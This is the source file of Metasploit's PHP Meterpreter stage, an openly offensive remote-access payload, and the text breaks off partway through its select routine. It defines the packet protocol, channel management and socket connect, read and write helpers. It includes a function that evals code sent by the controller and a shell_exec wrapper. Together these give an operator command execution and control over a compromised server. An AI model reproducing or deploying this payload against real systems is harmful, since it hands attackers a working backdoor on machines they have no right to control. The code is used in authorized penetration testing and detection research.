metasploit-framework/data/meterpreter/meterpreter.php

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#<?php
# global list of channels
if (!isset($GLOBALS['channels'])) {
$GLOBALS['channels'] = array();
}
# global resource map. This is how we know whether to use socket or stream
# functions on a channel.
if (!isset($GLOBALS['resource_type_map'])) {
$GLOBALS['resource_type_map'] = array();
}
# global map of sockets to the associated peer host.
if (!isset($GLOBALS['udp_host_map'])) {
$GLOBALS['udp_host_map'] = array();
}
# global list of resources we need to watch in the main select loop
if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array();
}
function my_print($str) {
#error_log($str);
}
my_print("Evaling main meterpreter stage");
# Be very careful not to put a # anywhere that isn't a comment (e.g. inside a
# string) as the comment remover will completely break this payload
function dump_array($arr, $name=null) {
if (is_null($name)) {
my_print(sprintf("Array (%s)", count($arr)));
} else {
my_print(sprintf("$name (%s)", count($arr)));
}
foreach ($arr as $key => $val) {
$foo = sprintf(" $key ($val)");
my_print($foo);
}
}
function dump_readers() {
global $readers;
dump_array($readers, 'Readers');
}
function dump_resource_map() {
global $resource_type_map;
dump_array($resource_type_map, 'Resource map');
}
# Doesn't exist before php 4.3
if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
$f = @fopen($file,"rb");
$contents = false;
if ($f) {
do { $contents .= fgets($f); } while (!feof($f));
}
fclose($f);
return $contents;
}
}
# Renamed in php 4.3
if (!function_exists('socket_set_option')) {
function socket_set_option($sock, $type, $opt, $value) {
socket_setopt($sock, $type, $opt, $value);
}
}
#
# Constants
#
define("PACKET_TYPE_REQUEST",0);
define("PACKET_TYPE_RESPONSE",1);
define("PACKET_TYPE_PLAIN_REQUEST", 10);
define("PACKET_TYPE_PLAIN_RESPONSE", 11);
define("ERROR_SUCCESS",0);
# not defined in original C implementation
define("ERROR_FAILURE",1);
define("CHANNEL_CLASS_BUFFERED", 0);
define("CHANNEL_CLASS_STREAM", 1);
define("CHANNEL_CLASS_DATAGRAM", 2);
define("CHANNEL_CLASS_POOL", 3);
#
# TLV Meta Types
#
define("TLV_META_TYPE_NONE", ( 0 ));
define("TLV_META_TYPE_STRING", (1 << 16));
define("TLV_META_TYPE_UINT", (1 << 17));
define("TLV_META_TYPE_RAW", (1 << 18));
define("TLV_META_TYPE_BOOL", (1 << 19));
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
define("TLV_META_TYPE_GROUP", (1 << 30));
define("TLV_META_TYPE_COMPLEX", (1 << 31));
# not defined in original
define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16));
#
# TLV base starting points
#
define("TLV_RESERVED", 0);
define("TLV_EXTENSIONS", 20000);
define("TLV_USER", 40000);
define("TLV_TEMP", 60000);
#
# TLV Specific Types
#
define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0);
define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1);
define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2);
define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3);
define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4);
define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10);
define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11);
define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12);
define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25);
define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26);
define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27);
define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50);
define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51);
define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52);
define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53);
define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54);
define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70);
define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71);
define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72);
define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300);
define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301);
define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400);
define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401);
define("TLV_TYPE_MIGRATE_PID", TLV_META_TYPE_UINT | 402);
define("TLV_TYPE_MIGRATE_LEN", TLV_META_TYPE_UINT | 403);
define("TLV_TYPE_CIPHER_NAME", TLV_META_TYPE_STRING | 500);
define("TLV_TYPE_CIPHER_PARAMETERS", TLV_META_TYPE_GROUP | 501);
##
# General
##
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
##
# Fs
##
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
##
# Net
##
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
# Socket
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
##
# Sys
##
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
# Registry
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
# Config
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
# Process
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
##
# Ui
##
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
##
# Event Log
##
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
##
# Power
##
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
function my_cmd($cmd) {
return shell_exec($cmd);
}
function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
}
##
# Worker functions
##
function core_channel_open($req, &$pkt) {
$type_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_TYPE);
my_print("Client wants a ". $type_tlv['value'] ." channel, i'll see what i can do");
# Doing it this way allows extensions to create new channel types without
# needing to modify the core code.
$handler = "channel_create_". $type_tlv['value'];
if ($type_tlv['value'] && is_callable($handler)) {
my_print("Calling {$handler}");
$ret = $handler($req, $pkt);
} else {
my_print("I don't know how to make a ". $type_tlv['value'] ." channel. =(");
$ret = ERROR_FAILURE;
}
return $ret;
}
# Works for streams
function core_channel_eof($req, &$pkt) {
my_print("doing channel eof");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$c = get_channel_by_id($chan_tlv['value']);
if ($c) {
if (eof($c[1])) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 1));
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 0));
}
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
# Works
function core_channel_read($req, &$pkt) {
my_print("doing channel read");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
$id = $chan_tlv['value'];
$len = $len_tlv['value'];
$data = channel_read($id, $len);
if ($data === false) {
$res = ERROR_FAILURE;
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
$res = ERROR_SUCCESS;
}
return $res;
}
# Works
function core_channel_write($req, &$pkt) {
my_print("doing channel write");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$data_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_DATA);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
$id = $chan_tlv['value'];
$data = $data_tlv['value'];
$len = $len_tlv['value'];
$wrote = channel_write($id, $data, $len);
if ($wrote === false) {
return ERROR_FAILURE;
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, $wrote));
return ERROR_SUCCESS;
}
}
function core_channel_close($req, &$pkt) {
global $processes;
# XXX remove the closed channel from $readers
my_print("doing channel close");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$id = $chan_tlv['value'];
$c = get_channel_by_id($id);
if ($c) {
# We found a channel, close its stdin/stdout/stderr
for($i = 0; $i < 3; $i++) {
#my_print("closing channel fd $i, {$c[$i]}");
if (array_key_exists($i, $c) && is_resource($c[$i])) {
close($c[$i]);
}
}
if (array_key_exists($id, $processes)) {
@proc_close($processes[$id]);
unset($processes[$id]);
}
return ERROR_SUCCESS;
}
return ERROR_FAILURE;
}
function core_channel_interact($req, &$pkt) {
global $readers;
my_print("doing channel interact");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$id = $chan_tlv['value'];
# True means start interacting, False means stop
$toggle_tlv = packet_get_tlv($req, TLV_TYPE_BOOL);
$c = get_channel_by_id($id);
if ($c) {
if ($toggle_tlv['value']) {
# Start interacting. If we're already interacting with this
# channel, it's an error and we should return failure.
if (!in_array($c[1], $readers)) {
# stdout
add_reader($c[1]);
# stderr, don't care if it fails
if (array_key_exists(2, $c) && $c[1] != $c[2]) {
add_reader($c[2]);
}
$ret = ERROR_SUCCESS;
} else {
# Already interacting
$ret = ERROR_FAILURE;
}
} else {
# Stop interacting. If we're not interacting yet with this
# channel, it's an error and we should return failure.
if (in_array($c[1], $readers)) {
remove_reader($c[1]); # stdout
remove_reader($c[2]); # stderr
$ret = ERROR_SUCCESS;
} else {
# Not interacting
$ret = ERROR_FAILURE;
}
}
} else {
# Not a valid channel
$ret = ERROR_FAILURE;
}
return $ret;
}
# zlib support is not compiled in by default, so this makes sure the library
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
my_print("doing core_loadlib (no-op)");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
} else {
eval($data_tlv['value']);
return ERROR_SUCCESS;
}
}
##
# Channel Helper Functions
##
$channels = array();
function register_channel($in, $out=null, $err=null) {
global $channels;
if ($out == null) { $out = $in; }
if ($err == null) { $err = $out; }
$id = count($channels);
$channels[] = array(0 => $in, 1 => $out, 2 => $err, 'type' => get_rtype($in));
my_print("Created new channel $in, with id $id");
return $id;
}
function get_channel_id_from_resource($resource) {
global $channels;
#my_print("Looking up channel from resource $resource");
for ($i = 0; $i < count($channels); $i++) {
if (in_array($resource, $channels[$i])) {
#my_print("Found channel id $i");
return $i;
}
}
return false;
}
function get_channel_by_id($chan_id) {
global $channels;
#my_print("Looking up channel id $chan_id");
if (array_key_exists($chan_id, $channels)) {
return $channels[$chan_id];
} else {
return false;
}
}
# Write data to the channel's stdin
function channel_write($chan_id, $data) {
$c = get_channel_by_id($chan_id);
if ($c && is_resource($c[0])) {
return write($c[0], $data);
} else {
return false;
}
}
# Read from the channel's stdout
function channel_read($chan_id, $len) {
$c = get_channel_by_id($chan_id);
if ($c && is_resource($c[1])) {
return read($c[1], $len);
} else {
return false;
}
}
##
# TLV Helper Functions
##
function generate_req_id() {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$rid = '';
for ($p = 0; $p < 32; $p++) {
$rid .= $characters[rand(0, strlen($characters))];
}
return $rid;
}
function handle_dead_resource_channel($resource) {
$cid = get_channel_id_from_resource($resource);
my_print("Handling dead resource: {$resource}");
close($resource);
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close'));
$req_id = generate_req_id();
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, $req_id));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
return $pkt;
}
function handle_resource_read_channel($resource, $data) {
global $udp_host_map;
$cid = get_channel_id_from_resource($resource);
my_print("Handling data from $resource: {$data}");
# Build a new Packet
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write'));
$req_id = generate_req_id();
if (array_key_exists((int)$resource, $udp_host_map)) {
list($h,$p) = $udp_host_map[(int)$resource];
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_PORT, $p));
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, strlen($data)));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, $req_id));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
return $pkt;
}
function create_response($req) {
$pkt = pack("N", PACKET_TYPE_RESPONSE);
$method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD);
#my_print("method is {$method_tlv['value']}");
packet_add_tlv($pkt, $method_tlv);
$reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID);
packet_add_tlv($pkt, $reqid_tlv);
if (is_callable($method_tlv['value'])) {
$result = $method_tlv['value']($req, $pkt);
} else {
my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure");
$result = ERROR_FAILURE;
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_RESULT, $result));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
return $pkt;
}
function create_tlv($type, $val) {
return array( 'type' => $type, 'value' => $val );
}
function tlv_pack($tlv) {
$ret = "";
#my_print("Creating a tlv of type: {$tlv['type']}");
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
}
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
}
elseif (($tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
# PHP's pack appears to be busted for chars,
$ret = pack("NN", 8 + 1, $tlv['type']);
$ret .= $tlv['value'] ? "\x01" : "\x00";
}
elseif (($tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
elseif (($tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP) {
# treat groups the same as raw
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
elseif (($tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX) {
# treat complex the same as raw
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
else {
my_print("Don't know how to make a tlv of type ". $tlv['type'] . " (meta type ". sprintf("%08x", $tlv['type'] & TLV_META_TYPE_MASK) ."), wtf");
}
return $ret;
}
function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv);
}
function packet_get_tlv($pkt, $type) {
#my_print("Looking for a tlv of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
$offset += $tlv['len'];
}
#my_print("Didn't find one, wtf");
return false;
}
##
# Functions for genericizing the stream/socket conundrum
##
function register_socket($sock, $ipaddr=null, $port=null) {
global $resource_type_map, $udp_host_map;
my_print("Registering socket $sock for ($ipaddr:$port)");
$resource_type_map[(int)$sock] = 'socket';
if ($ipaddr) {
$udp_host_map[(int)$sock] = array($ipaddr, $port);
#dump_array($udp_host_map, "UDP Map after registering a new socket");
}
}
# The stream functions cannot be unconnected, so don't require a host map
function register_stream($stream, $ipaddr=null, $port=null) {
global $resource_type_map, $udp_host_map;
my_print("Registering stream $stream for ($ipaddr:$port)");
$resource_type_map[(int)$stream] = 'stream';
if ($ipaddr) {
$udp_host_map[(int)$stream] = array($ipaddr, $port);
#dump_array($udp_host_map, "UDP Map after registering a new stream");
}
}
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
my_print("stream_socket_client");
$sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
if (!$sock) { return false; }
if ($proto == 'tcp') {
register_stream($sock);
} elseif ($proto == 'udp') {
register_stream($sock, $ipaddr, $port);
}
} else
if (is_callable('fsockopen')) {
my_print("fsockopen");
if ($proto == 'tcp') {
$sock = fsockopen($ipaddr,$port);
if (!$sock) { return false; }
register_stream($sock);
} else {
$sock = fsockopen($proto."://".$ipaddr,$port);
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
} elseif (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$res = socket_connect($sock, $ipaddr, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
register_socket($sock, $ipaddr, $port);
}
}
return $sock;
}
function eof($resource) {
$ret = false;
switch (get_rtype($resource)) {
# XXX Doesn't work with sockets.
case 'socket': break;
case 'stream': $ret = feof($resource); break;
}
return $ret;
}
function close($resource) {
my_print("Closing resource $resource");
global $readers, $resource_type_map, $udp_host_map;
remove_reader($resource);
switch (get_rtype($resource)) {
case 'socket': $ret = socket_close($resource); break;
case 'stream': $ret = fclose($resource); break;
}
# Every resource should be in the resource type map, but check anyway
if (array_key_exists((int)$resource, $resource_type_map)) {
unset($resource_type_map[(int)$resource]);
}
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Removing $resource from udp_host_map");
unset($udp_host_map[(int)$resource]);
}
return $ret;
}
function read($resource, $len=null) {
global $udp_host_map;
# Max packet length is magic. If we're reading a pipe that has data but
# isn't going to generate any more without some input, then reading less
# than all bytes in the buffer or 8192 bytes, the next read will never
# return.
if (is_null($len)) { $len = 8192; }
my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
$buff = '';
switch (get_rtype($resource)) {
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Reading UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
socket_recvfrom($resource, $buff, $len, PHP_BINARY_READ, $host, $port);
} else {
$buff = socket_read($resource, $len, PHP_BINARY_READ);
}
break;
case 'stream': $buff = fread($resource, $len); break;
default: my_print("Wtf don't know how to read from resource $resource"); break;
}
my_print(sprintf("Read %d bytes", strlen($buff)));
return $buff;
}
function write($resource, $buff, $len=0) {
global $udp_host_map;
if ($len == 0) { $len = strlen($buff); }
my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
$count = false;
switch (get_rtype($resource)) {
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Writing UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
$count = socket_sendto($resource, $buff, $len, $host, $port);
} else {
$count = socket_write($resource, $buff, $len);
}
break;
case 'stream': $count = fwrite($resource, $buff, $len); break;
default: my_print("Wtf don't know how to write to resource $resource"); break;
}
my_print("Wrote $count bytes");
return $count;
}
function get_rtype($resource) {
global $resource_type_map;
if (array_key_exists((int)$resource, $resource_type_map)) {
return $resource_type_map[(int)$resource];
}
return false;
}
function select(&$r, &$w, &$e, $tv_sec=0, $tv_usec=0) {
$streams_r = array();
$streams_w = array();
$streams_e = array();
$sockets_r = array();
$sockets_w = array();
$sockets_e = array();
if ($r) {
foreach ($r as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_r[] = $resource; break;
case 'stream': $streams_r[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
if ($w) {
foreach ($w as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_w[] = $resource; break;
case 'stream': $streams_w[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
if ($e) {
foreach ($e as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_e[] = $resource; break;
case 'stream': $streams_e[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
$n_sockets = count($sockets_r) + count($sockets_w) + count($sockets_e);
$n_streams = count($streams_r) + count($streams_w) + count($streams_e);
#my_print("Selecting $n_sockets sockets and $n_streams streams with timeout $tv_sec.$tv_usec");
$r = array();
$w = array();
$e = array();
# Workaround for some versions of PHP that throw an error and bail out if
# select is given an empty array
if (count($sockets_r)==0) { $sockets_r = null; }
if (count($sockets_w)==0) { $sockets_w = null; }
if (count($sockets_e)==0) { $sockets_e = null; }
if (count($streams_r)==0) { $streams_r = null; }
if (count($streams_w)==0) { $streams_w = null; }
if (count($streams_e)==0) { $streams_e = null; }
$count = 0;
if ($n_sockets > 0) {
$res = socket_select($sockets_r, $sockets_w, $sockets_e, $tv_sec, $tv_usec);
if (false === $res) { return false; }
if (is_array($r) && is_array($sockets_r)) { $r = array_merge($r, $sockets_r); }
if (is_array($w) && is_array($sockets_w)) { $w = array_merge($w, $sockets_w); }
if (is_array($e) && is_array($sockets_e)) { $e = array_merge($e, $sockets_e); }
$count += $res;
}
if ($n_streams > 0) {
$res = stream_select($streams_r, $streams_w, $streams_e, $tv_sec, $tv_usec);
if (false === $res) { return false; }
if (is_array($r) && is_array($streams_r)) { $r = array_merge($r, $streams_r); }
if (is_array($w) && is_array($streams_w)) { $w = array_merge($w, $streams_w); }
if (is_array($e) && is_array($streams_e)) { $e = array_merge($e, $streams_e); }
$count += $res;
}
